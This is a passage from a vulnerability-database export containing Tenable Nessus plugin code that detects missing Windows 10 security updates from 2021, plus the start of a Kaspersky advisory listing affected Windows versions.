value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n 
bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:17", "description": "The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42278", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42286", "CVE-2021-42287", "CVE-2021-42288", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007186.NASL", "href": "https://www.tenable.com/plugins/nessus/154986", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154986);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42278\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42286\",\n \"CVE-2021-42287\",\n \"CVE-2021-42288\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007186\");\n script_xref(name:\"MSFT\", value:\"MS21-5007186\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007186: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 (November 2021) \");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007186.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285, CVE-2021-42286)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42275,\n CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007186\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5007186.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007186');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186])\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007186]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": 
"NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:58:15", "description": "### *Detect date*:\n08/10/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service 
